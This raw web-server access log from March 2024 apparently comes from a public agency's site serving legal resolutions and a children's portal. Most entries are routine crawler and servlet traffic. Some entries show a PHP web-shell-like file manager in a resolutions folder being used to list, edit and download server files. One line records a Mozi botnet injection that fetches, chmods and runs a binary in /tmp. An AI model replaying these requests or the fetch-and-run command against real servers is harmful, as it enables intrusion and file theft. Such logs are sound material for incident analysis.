47.128.54.9 - - [22/Mar/2024:01:26:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.54.9 - - [22/Mar/2024:01:26:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3186.pdf&ft=html HTTP/1.1" 200 301477
216.245.221.92 - - [22/Mar/2024:01:26:54 -0500] "HEAD / HTTP/1.1" 200 -
47.128.27.197 - - [22/Mar/2024:01:26:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=6045.pdf&ft=edit HTTP/1.1" 200 3104
47.128.27.197 - - [22/Mar/2024:01:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.27.197 - - [22/Mar/2024:01:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.27.197 - - [22/Mar/2024:01:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.27.197 - - [22/Mar/2024:01:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.27.197 - - [22/Mar/2024:01:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.27.197 - - [22/Mar/2024:01:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.27.197 - - [22/Mar/2024:01:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.27.197 - - [22/Mar/2024:01:27:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.27.197 - - [22/Mar/2024:01:27:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.27.197 - - [22/Mar/2024:01:27:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
66.249.66.21 - - [22/Mar/2024:01:27:09 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202022/4485.pdf HTTP/1.1" 304 -
47.128.51.108 - - [22/Mar/2024:01:27:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3394.pdf&ft=download HTTP/1.1" 200 376487
47.128.122.92 - - [22/Mar/2024:01:27:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5Cautodeclaracion&sort=0d HTTP/1.1" 200 4129
47.128.122.92 - - [22/Mar/2024:01:27:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
47.128.122.92 - - [22/Mar/2024:01:27:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_css HTTP/1.1" 200 134
47.128.122.92 - - [22/Mar/2024:01:27:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_js HTTP/1.1" 200 131
47.128.122.92 - - [22/Mar/2024:01:27:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.122.92 - - [22/Mar/2024:01:27:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
172.22.2.4 - - [22/Mar/2024:01:26:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62720
172.22.2.4 - - [22/Mar/2024:01:28:04 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
201.245.192.253 - - [22/Mar/2024:01:28:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:01:28:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:01:28:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37035
201.245.192.253 - - [22/Mar/2024:01:28:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38083
201.245.192.253 - - [22/Mar/2024:01:29:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37762
201.245.192.253 - - [22/Mar/2024:01:29:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
172.22.2.4 - - [22/Mar/2024:01:28:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:01:30:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38083
52.167.144.20 - - [22/Mar/2024:01:31:06 -0500] "GET /BLA/resoluciones/AUTOS%202022/2977.pdf HTTP/1.1" 304 -
172.22.2.4 - - [22/Mar/2024:01:29:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
216.245.221.92 - - [22/Mar/2024:01:31:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:01:32:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:01:32:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
52.167.144.20 - - [22/Mar/2024:01:33:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7615.pdf HTTP/1.1" 200 446633
13.56.33.4 - - [22/Mar/2024:01:33:41 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.198 - - [22/Mar/2024:01:33:58 -0500] "GET /Publicaciones/2024EE43423.pdf HTTP/1.1" 404 227
201.245.192.253 - - [22/Mar/2024:01:34:01 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:01:34:50 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:01:34:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
114.119.158.113 - - [22/Mar/2024:01:35:41 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2019/ HTTP/1.1" 200 14291
201.245.192.253 - - [22/Mar/2024:01:35:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
201.245.192.253 - - [22/Mar/2024:01:36:12 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:01:34:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:01:36:50 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [22/Mar/2024:01:36:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:01:36:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
172.22.2.4 - - [22/Mar/2024:01:35:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
66.249.66.19 - - [22/Mar/2024:01:37:15 -0500] "GET /Publicaciones/2024EE09788.pdf HTTP/1.1" 404 227
201.245.192.253 - - [22/Mar/2024:01:37:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
172.22.2.4 - - [22/Mar/2024:01:37:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:01:38:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37035
201.245.192.253 - - [22/Mar/2024:01:38:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38083
201.245.192.253 - - [22/Mar/2024:01:39:26 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:01:37:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 44737
172.22.2.4 - - [22/Mar/2024:01:38:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:01:39:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37762
201.245.192.253 - - [22/Mar/2024:01:40:04 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
207.46.13.141 - - [22/Mar/2024:01:40:15 -0500] "GET /portaldeninos/?s=2023 HTTP/1.1" 200 87105
172.22.2.4 - - [22/Mar/2024:01:38:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49794
201.245.192.253 - - [22/Mar/2024:01:40:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38083
216.245.221.92 - - [22/Mar/2024:01:41:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [22/Mar/2024:01:40:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [22/Mar/2024:01:42:09 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
191.102.85.241 - - [22/Mar/2024:01:42:12 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 14105
191.102.85.241 - - [22/Mar/2024:01:42:14 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2023%2F HTTP/1.1" 200 514165
201.245.192.253 - - [22/Mar/2024:01:42:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
172.22.2.4 - - [22/Mar/2024:01:41:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
201.245.192.253 - - [22/Mar/2024:01:43:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:01:44:34 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [22/Mar/2024:01:46:54 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [22/Mar/2024:01:47:09 -0500] "GET /BLA/resoluciones/AUTOS%202016/1714.pdf HTTP/1.1" 200 469433
216.244.66.195 - - [22/Mar/2024:01:47:15 -0500] "GET /BLA/resoluciones/AUTOS%202016/2059.pdf HTTP/1.1" 200 383069
216.244.66.195 - - [22/Mar/2024:01:47:20 -0500] "GET /BLA/resoluciones/AUTOS%202016/2109.pdf HTTP/1.1" 200 329889
216.244.66.195 - - [22/Mar/2024:01:47:25 -0500] "GET /BLA/resoluciones/AUTOS%202016/2213.pdf HTTP/1.1" 200 549627
201.245.192.253 - - [22/Mar/2024:01:47:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [22/Mar/2024:01:47:29 -0500] "GET /BLA/resoluciones/AUTOS%202016/2404.pdf HTTP/1.1" 200 552977
216.244.66.195 - - [22/Mar/2024:01:47:33 -0500] "GET /BLA/resoluciones/AUTOS%202016/2493.pdf HTTP/1.1" 200 291770
216.244.66.195 - - [22/Mar/2024:01:47:36 -0500] "GET /BLA/resoluciones/AUTOS%202016/2506.pdf HTTP/1.1" 200 326295
216.244.66.195 - - [22/Mar/2024:01:47:51 -0500] "GET /BLA/resoluciones/AUTOS%202016/2510.pdf HTTP/1.1" 200 338668
172.22.2.4 - - [22/Mar/2024:01:46:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:01:48:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [22/Mar/2024:01:48:06 -0500] "GET /BLA/resoluciones/AUTOS%202016/2692.pdf HTTP/1.1" 200 526578
216.244.66.195 - - [22/Mar/2024:01:48:18 -0500] "GET /BLA/resoluciones/AUTOS%202016/2934.pdf HTTP/1.1" 200 637488
172.22.2.4 - - [22/Mar/2024:01:47:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [22/Mar/2024:01:48:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
201.245.192.253 - - [22/Mar/2024:01:47:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 21429
201.245.192.253 - - [22/Mar/2024:01:49:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:01:49:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
52.167.144.21 - - [22/Mar/2024:01:50:14 -0500] "GET /caminatas-ecologicas-conocer-y-contemplar-para-conservar.html HTTP/1.1" 200 864
216.244.66.195 - - [22/Mar/2024:01:50:38 -0500] "GET /BLA/resoluciones/AUTOS%202005/2743.pdf HTTP/1.1" 200 180483
216.244.66.195 - - [22/Mar/2024:01:50:47 -0500] "GET /BLA/resoluciones/AUTOS%202016/1148.pdf HTTP/1.1" 200 338293
173.252.127.116 - - [22/Mar/2024:01:51:12 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
172.22.2.4 - - [22/Mar/2024:01:51:23 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 304 -
201.245.192.253 - - [22/Mar/2024:01:51:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [22/Mar/2024:01:51:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:01:52:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:01:53:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [22/Mar/2024:01:53:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/03479.pdf HTTP/1.1" 200 332503
172.22.2.4 - - [22/Mar/2024:01:52:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [22/Mar/2024:01:52:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [22/Mar/2024:01:54:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
216.244.66.195 - - [22/Mar/2024:01:56:44 -0500] "GET /BLA/resoluciones/AUTOS%202007/0619.pdf HTTP/1.1" 200 91991
216.245.221.92 - - [22/Mar/2024:01:56:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:01:57:09 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [22/Mar/2024:01:57:12 -0500] "GET /BLA/resoluciones/AUTOS%202007/1622.pdf HTTP/1.1" 200 95728
80.66.88.211 - - [22/Mar/2024:01:57:20 -0500] "\x03" 400 226
216.244.66.195 - - [22/Mar/2024:01:57:41 -0500] "GET /BLA/resoluciones/AUTOS%202007/1920.pdf HTTP/1.1" 200 89584
201.245.192.253 - - [22/Mar/2024:01:57:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [22/Mar/2024:01:58:11 -0500] "GET /BLA/resoluciones/AUTOS%202023/3429.pdf HTTP/1.1" 200 392091
3.212.128.62 - - [22/Mar/2024:01:58:34 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [22/Mar/2024:01:58:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201997/0937.pdf HTTP/1.1" 200 74304
207.46.13.6 - - [22/Mar/2024:01:58:57 -0500] "GET /documents/10184/5989426/25+Incendio+declaratoria.jpeg/2570a4de-5f5a-42d2-8c62-e69965a700bc?t=1706192477736 HTTP/1.1" 404 1034
216.244.66.195 - - [22/Mar/2024:01:59:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1890.pdf HTTP/1.1" 200 410029
201.245.192.253 - - [22/Mar/2024:01:59:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [22/Mar/2024:01:59:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0043.pdf HTTP/1.1" 200 345152
172.22.2.4 - - [22/Mar/2024:01:57:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [22/Mar/2024:01:59:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0121.pdf HTTP/1.1" 200 291109
201.245.192.253 - - [22/Mar/2024:01:59:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
201.245.192.253 - - [22/Mar/2024:01:59:59 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [22/Mar/2024:02:00:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0565.pdf HTTP/1.1" 200 357633
172.22.2.4 - - [22/Mar/2024:01:58:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
40.77.167.243 - - [22/Mar/2024:02:00:37 -0500] "GET /portaldeninos/?s=2024 HTTP/1.1" 200 85855
216.244.66.195 - - [22/Mar/2024:02:01:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1675.pdf HTTP/1.1" 200 282561
201.245.192.253 - - [22/Mar/2024:02:01:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [22/Mar/2024:02:01:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2703.pdf HTTP/1.1" 200 355923
40.77.167.68 - - [22/Mar/2024:02:01:49 -0500] "GET /BLA/resoluciones/AUTOS%202013/0077.pdf HTTP/1.1" 304 -
216.245.221.92 - - [22/Mar/2024:02:01:54 -0500] "HEAD / HTTP/1.1" 200 -
165.154.162.212 - - [22/Mar/2024:02:02:01 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
165.154.162.212 - - [22/Mar/2024:02:02:02 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
165.154.162.212 - - [22/Mar/2024:02:02:02 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
165.154.162.212 - - [22/Mar/2024:02:02:04 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
165.154.162.212 - - [22/Mar/2024:02:02:05 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
201.245.192.253 - - [22/Mar/2024:02:02:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [22/Mar/2024:02:02:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2855.pdf HTTP/1.1" 200 279469
216.244.66.195 - - [22/Mar/2024:02:02:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3453.pdf HTTP/1.1" 200 3055228
114.119.135.199 - - [22/Mar/2024:02:02:54 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%2B2012/ HTTP/1.1" 200 14312
201.245.192.253 - - [22/Mar/2024:02:03:29 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:03:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.244.66.195 - - [22/Mar/2024:02:03:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3468.pdf HTTP/1.1" 200 439043
216.244.66.195 - - [22/Mar/2024:02:04:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3494.pdf HTTP/1.1" 200 277525
201.245.192.253 - - [22/Mar/2024:02:04:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
216.244.66.195 - - [22/Mar/2024:02:05:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3528.pdf HTTP/1.1" 200 323520
114.119.135.172 - - [22/Mar/2024:02:05:14 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/AUTOS%2B2016/&sort=name&order=asc HTTP/1.1" 200 14353
221.14.11.151 - - [22/Mar/2024:02:05:16 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 946
172.22.2.4 - - [22/Mar/2024:02:03:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:02:05:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [22/Mar/2024:02:05:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3645.pdf HTTP/1.1" 200 639222
172.22.2.4 - - [22/Mar/2024:02:05:56 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [22/Mar/2024:02:04:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 42478
216.244.66.195 - - [22/Mar/2024:02:06:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3770.pdf HTTP/1.1" 200 390086
172.22.2.4 - - [22/Mar/2024:02:04:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [22/Mar/2024:02:06:54 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Mar/2024:02:06:59 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.244.66.195 - - [22/Mar/2024:02:07:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3835.pdf HTTP/1.1" 200 318296
172.22.2.4 - - [22/Mar/2024:02:05:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [22/Mar/2024:02:05:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45535
201.245.192.253 - - [22/Mar/2024:02:07:38 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:06:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49224
66.249.66.165 - - [22/Mar/2024:02:08:40 -0500] "GET /portaldeninos/corresponsal-ambiental/ HTTP/1.1" 200 93768
201.245.192.253 - - [22/Mar/2024:02:09:05 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d65e7a44aedd6c4e8b8a078f956b9fbf50.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [22/Mar/2024:02:07:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61913
201.245.192.253 - - [22/Mar/2024:02:09:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6a3adf64eb8e9433c86d0dc471af886a3.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [22/Mar/2024:02:09:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
186.28.213.82 - - [22/Mar/2024:02:11:00 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1++OpTBBDiKBkTDE5txQQigfkQcbu7QsPb96Er9bMidxMvxGRdbxwfE&y=U2FsdGVkX188HeRG5/eYSa6vvTBLZtf74QMkNInw1Rn9Mz+9DQw6h98YR2qsByfL HTTP/1.1" 200 30
186.28.213.82 - - [22/Mar/2024:02:11:00 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+Y5LZvQsQdEo+HyXZ7RL3vnnaZOTBJeY/+o3O7c1h8JNOjdYON7IS2muXR0mAnljRPmVFuxI/KPQt/CRNX5WZ6RTBaMyqA9g0=&u=U2FsdGVkX19yq+wjdPr1hlr7/GL4lrmPybYeDoCwugY=&y=U2FsdGVkX188HeRG5/eYSa6vvTBLZtf74QMkNInw1Rn9Mz+9DQw6h98YR2qsByfL HTTP/1.1" 200 97
